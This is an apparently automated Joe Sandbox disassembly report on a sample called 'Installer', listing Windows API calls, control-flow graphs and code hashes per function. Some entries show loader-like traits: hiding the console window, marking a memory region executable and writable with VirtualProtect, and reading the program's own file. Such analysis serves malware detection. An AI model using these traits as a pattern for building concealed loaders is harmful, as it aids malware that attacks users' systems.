• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID:
• String ID: p6
• API String ID: 0-3779050237
• Opcode ID: 49ee100148ccc27d6c9ebe680740623eb26d6e5a5534ca1fbd75a656a07f8329
• Instruction ID: 121275928345a6242f5c1eb7cc2ab4c0b1a98f26b4e9bbe64ee32d7356dcc964
• Opcode Fuzzy Hash: 49ee100148ccc27d6c9ebe680740623eb26d6e5a5534ca1fbd75a656a07f8329
• Instruction Fuzzy Hash: 9E214C336105650B87AE9F386D62037FBCADBC66A0706573EED129F2D1E521ED9082E4

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleWindow.KERNELBASE ref: 003424DD
                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 003424E6
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00342524
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0034253A,?,?,00000000), ref: 0034F129
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,0034253A,?,?,00000000), ref: 0034F142
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: CloseHandle.KERNEL32(?,?,?,0034253A,?,?,00000000), ref: 0034F154
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342567
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342578
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342589
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0034259A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
• String ID:
• API String ID: 3956949563-0
• Opcode ID: 3ccacfe30d1597e36426a3c35a6b90c606c3be31d44b7d1fbfa4157e2295af21
• Instruction ID: 2c8a740766a7d515d8ecb75ffee1ce2b2aa4b59a0e0ed38ab1b06a6d59380b5c
• Opcode Fuzzy Hash: 3ccacfe30d1597e36426a3c35a6b90c606c3be31d44b7d1fbfa4157e2295af21
• Instruction Fuzzy Hash: 472174F2D402159BDF12AF949C06BDFBAF8AF04710F080165F9087E291E7B6B554CBA6

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,C82EE5EC,?,0035D01A,?,?,00000000), ref: 0035CFCC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: f8608a2687a9ae2a0c022313fa8d6f8727e5bc3deecbbd76761d8a31658c17cb
• Instruction ID: 657c2cce6cffb0c270b6987f3b3fe28868177f020f009fd6f6d6db500577adeb
• Opcode Fuzzy Hash: f8608a2687a9ae2a0c022313fa8d6f8727e5bc3deecbbd76761d8a31658c17cb
• Instruction Fuzzy Hash: 2F210231A11711AFCB338B64DC51E5AB76EDF4176AF261111ED0AA72A0DB30ED08CBD0

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: _strlen
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 4218353326-1866435925
• Opcode ID: d4a94234ed542104b119ea23f373db50e851b77d5e07e24ec0e111e51fadfaba
• Instruction ID: b625be1e48f712ee84b018ff9c3f3d4fb87f9ac7a8671f9ac160f1f809bd0e52
• Opcode Fuzzy Hash: d4a94234ed542104b119ea23f373db50e851b77d5e07e24ec0e111e51fadfaba
• Instruction Fuzzy Hash: 35F15D75A006148FCB15CF68C494BADBBF1FF89324F198269E819AF3A1D734AD45CB90

Control-flow Graph

APIs
• CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00355392
• GetLastError.KERNEL32(?,?,?,00342513,00000000,00000000), ref: 0035539E
• __dosmaperr.LIBCMT ref: 003553A5
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744730728-0
                                                                                                                                                                                                                                                    • Opcode ID: 7c99d49529a3bcfb818fe5a5c096705d4b2a107e668ff2d2892371778c6e7329
                                                                                                                                                                                                                                                    • Instruction ID: 51200e127d9a59d3b2cb019620444210284cc305e891e306595191c84559498d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c99d49529a3bcfb818fe5a5c096705d4b2a107e668ff2d2892371778c6e7329
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4019276501619EBDF179FA0DC26EAE3B68FF00392F114058FC0596160EBB0E944DB50

Control-flow Graph (function starting at 3554ee; graph rendering not reproduced)
APIs
  • Part of subcall function 0035C2BB: GetLastError.KERNEL32(00000000,?,003576E9,0035D306,?,?,0035C1B7,00000001,00000364,?,00000006,000000FF,?,00355495,00378E38,0000000C), ref: 0035C2BF
  • Part of subcall function 0035C2BB: SetLastError.KERNEL32(00000000), ref: 0035C361
• CloseHandle.KERNEL32(?,?,?,003553D9,?,?,003554CE,00000000), ref: 0035551F
• FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,003553D9,?,?,003554CE,00000000), ref: 00355535
• ExitThread.KERNEL32 ref: 0035553E
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: ErrorExitLastThread$CloseFreeHandleLibrary
• String ID:
• API String ID: 1991824761-0
• Opcode ID: cc527fdc779240c44b05aec372e4b894cf9385f8792070b41b9bbc265583774d
• Instruction ID: 3b94d71c2e412fbcd7040ae1c774d58fa221bb031bcdb9214b2b1a7ced47f1cf
• Opcode Fuzzy Hash: cc527fdc779240c44b05aec372e4b894cf9385f8792070b41b9bbc265583774d
• Instruction Fuzzy Hash: 5FF05470100F016BDB335B759829E1A3A9AAF02372F0A4E14FC6BC70B0EB20FD4A8750

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(00000002,?,00355721,00358396,00358396,?,00000002,C82EE5EC,00358396,00000002), ref: 00355670
• TerminateProcess.KERNEL32(00000000,?,00355721,00358396,00358396,?,00000002,C82EE5EC,00358396,00000002), ref: 00355677
• ExitProcess.KERNEL32 ref: 00355689
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 2596ef31b60383bf4fd2a7475b69e6462586a0d04a7186fc048fbc009a1f8bd3
• Instruction ID: 03369a2be18cfcd9381881408e383489d69e5718647646e87afa105af105483e
• Opcode Fuzzy Hash: 2596ef31b60383bf4fd2a7475b69e6462586a0d04a7186fc048fbc009a1f8bd3
• Instruction Fuzzy Hash: 08D06C31000A49ABCF232F61DC6ED993F2AEB40382B445414B9494A072DF32A99ADA84

Control-flow Graph (function starting at 363bf4; graph rendering not reproduced)
APIs
  • Part of subcall function 00363F9E: GetConsoleOutputCP.KERNEL32(C82EE5EC,00000000,00000000,?), ref: 00364001
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00358584,?), ref: 00363D79
• GetLastError.KERNEL32(?,?,00358584,?,003587C8,00000000,?,00000000,003587C8,?,?,?,00378FE8,0000002C,003586B4,?), ref: 00363D83
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: ConsoleErrorFileLastOutputWrite
• String ID:
• API String ID: 2915228174-0
• Opcode ID: 8bf33df3fa841ecf0a11a716be97971b174dd86e9e03761365b8b4e07dc71598
• Instruction ID: 0ab693587cca71e286d1066c0d2717cbdd61bda59628905626234ee1ec1366e4
• Opcode Fuzzy Hash: 8bf33df3fa841ecf0a11a716be97971b174dd86e9e03761365b8b4e07dc71598
• Instruction Fuzzy Hash: 6C61B371D04159AFDF12CFA8C885AEEBFB9AF49304F158145F805BB25AD732DA11CBA0

Control-flow Graph

control_flow_graph 409 3643cd-364422 call 350050 412 364497-3644a7 call 34a6e1 409->412 413 364424 409->413 414 36442a 413->414 416 364430-364432 414->416 418 364434-364439 416->418 419 36444c-364471 WriteFile 416->419 420 364442-36444a 418->420 421 36443b-364441 418->421 422 364473-36447e 419->422 423 36448f-364495 GetLastError 419->423 420->416 420->419 421->420 422->412 424 364480-36448b 422->424 423->412 424->414 425 36448d 424->425 425->412
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00363D5F,00000000,003587C8,?,00000000,?,00000000), ref: 00364469
• GetLastError.KERNEL32(?,00363D5F,00000000,003587C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00358584), ref: 0036448F
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 89ca9217b7ee1c6fa7047c44eca2a03d94fa7119329201123250df3b896bcd29
• Instruction ID: 14f344345e1d288c52e742b05c737fe0bd0c83ed6a2f678f42013065ba737822
• Opcode Fuzzy Hash: 89ca9217b7ee1c6fa7047c44eca2a03d94fa7119329201123250df3b896bcd29
• Instruction Fuzzy Hash: 5721B130A002199FCB1BCF1ADC81AE9B7B9EF48305F1480A9E90AD7215DA30DD82CF60

Control-flow Graph

control_flow_graph 426 3490f0-349130 call 34efc1 429 349136-34913d 426->429 430 3491c7-3491c9 call 34b317 426->430 431 349143-349149 429->431 432 3491ce-3491df call 34b317 429->432 430->432 434 349174-34919a call 34efd2 call 3492f0 431->434 435 34914b-349172 call 34efd2 431->435 442 34919f-3491b1 call 34a660 432->442 434->442 445 3491b6-3491c6 435->445 442->445
APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 003491C9
• std::_Throw_Cpp_error.LIBCPMT ref: 003491D7
  • Part of subcall function 0034EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00348E4A,0034A2F0), ref: 0034EFE7
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
• String ID:
• API String ID: 3666349979-0
• Opcode ID: 6e2b041d3be4b1231d976d259902bcebb54f59d348c4d7720e36d1af65dba553
• Instruction ID: 70c9905e27413758a18d2c624953ff5f9706b9f0a95a55ceb11ba529c62ad223
• Opcode Fuzzy Hash: 6e2b041d3be4b1231d976d259902bcebb54f59d348c4d7720e36d1af65dba553
• Instruction Fuzzy Hash: EB21F1B0A006469BEB119FA48D46BAEBBF4FB04320F144229E5296F381D734B904CBD2

Control-flow Graph

control_flow_graph 448 35da52-35da57 449 35da59-35da71 448->449 450 35da73-35da77 449->450 451 35da7f-35da88 449->451 450->451 452 35da79-35da7d 450->452 453 35da9a 451->453 454 35da8a-35da8d 451->454 455 35daf4-35daf8 452->455 458 35da9c-35daa9 GetStdHandle 453->458 456 35da96-35da98 454->456 457 35da8f-35da94 454->457 455->449 459 35dafe-35db01 455->459 456->458 457->458 460 35dad6-35dae8 458->460 461 35daab-35daad 458->461 460->455 463 35daea-35daed 460->463 461->460 462 35daaf-35dab8 GetFileType 461->462 462->460 464 35daba-35dac3 462->464 463->455 465 35dac5-35dac9 464->465 466 35dacb-35dace 464->466 465->455 466->455 467 35dad0-35dad4 466->467 467->455
APIs
• GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0035D941,00379330,0000000C), ref: 0035DA9E
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0035D941,00379330,0000000C), ref: 0035DAB0
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: eeefd7e55da57bf169e909af99b0d914a781cc8fc94672308386c1b8027e80b8
• Instruction ID: 133105d9b132bb52f2da6b2190e0962ad942cd63c88da87ee063a161593dd430
• Opcode Fuzzy Hash: eeefd7e55da57bf169e909af99b0d914a781cc8fc94672308386c1b8027e80b8
• Instruction Fuzzy Hash: 0B11DD7110C7424AC7328E3E8C88A237AA9AB56332B390759D8B7C65F5C670D88ED600

Control-flow Graph

APIs
  • Part of subcall function 00341240: _strlen.LIBCMT ref: 003412BA
• FreeConsole.KERNELBASE(?,?,?,?,?,0034173F,?,?,?,00000000,?), ref: 00341F21
• VirtualProtect.KERNELBASE(0037A011,00000549,00000040,?), ref: 00341F78
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: ConsoleFreeProtectVirtual_strlen
• String ID:
• API String ID: 1248733679-0
• Opcode ID: 8fe193ab96df858dbce68a84a7d1b868e96a39db6742d7dc037744015a8feaea
• Instruction ID: b42d6f718794b3efa8bc2a44722f0e5ff8fbf45f4a0a91c60fba1a325f3d89e4
• Opcode Fuzzy Hash: 8fe193ab96df858dbce68a84a7d1b868e96a39db6742d7dc037744015a8feaea
• Instruction Fuzzy Hash: 9E11A371A405086BDB16BB65EC02EFF77B8EB84701F048829F608AB282E67569905BD1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00378E38,0000000C), ref: 00355483
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0035548A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1611280651-0
                                                                                                                                                                                                                                                    • Opcode ID: cbbf5e5e24b7df3dfc4b62375458640a1b1458c293bee2e5665f6c7e2c3fbb31
                                                                                                                                                                                                                                                    • Instruction ID: 714046e21d3f791b2a8ecf2e4e79acd564be4cdc8ae08713116a45c3b71b350f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbbf5e5e24b7df3dfc4b62375458640a1b1458c293bee2e5665f6c7e2c3fbb31
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F0AFB1A00A059FDB13AF70C81AE6E7B74EF04752F104459F80AAB2B2CF746985CB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00342288
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0034229C
                                                                                                                                                                                                                                                      • Part of subcall function 00341FB0: CreateFileA.KERNELBASE ref: 00342036
                                                                                                                                                                                                                                                      • Part of subcall function 00341FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00342046
                                                                                                                                                                                                                                                      • Part of subcall function 00341FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0034206B
                                                                                                                                                                                                                                                      • Part of subcall function 00341FB0: CloseHandle.KERNELBASE(00000000), ref: 0034207A
                                                                                                                                                                                                                                                      • Part of subcall function 00341FB0: _strlen.LIBCMT ref: 003420CD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3505371420-0
                                                                                                                                                                                                                                                    • Opcode ID: 3db52c151ce2c4d9e4f6ff0359d78a9d8f0ec057e0c8bd2166b50d1240c8b59b
                                                                                                                                                                                                                                                    • Instruction ID: 7207069ac0c89cede0d778a13643a9ce71beeb6cd5a960c037efb21be78bf7fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3db52c151ce2c4d9e4f6ff0359d78a9d8f0ec057e0c8bd2166b50d1240c8b59b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5F0E5B19012102BD1337724BC0BFAB7BBCDF85710F000514F58D5E182EA7421858AD3
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,003602B4,?,00000000,?,?,0035FF54,?,00000007,?,?,0036089A,?,?), ref: 0035BEED
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,003602B4,?,00000000,?,?,0035FF54,?,00000007,?,?,0036089A,?,?), ref: 0035BEF8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
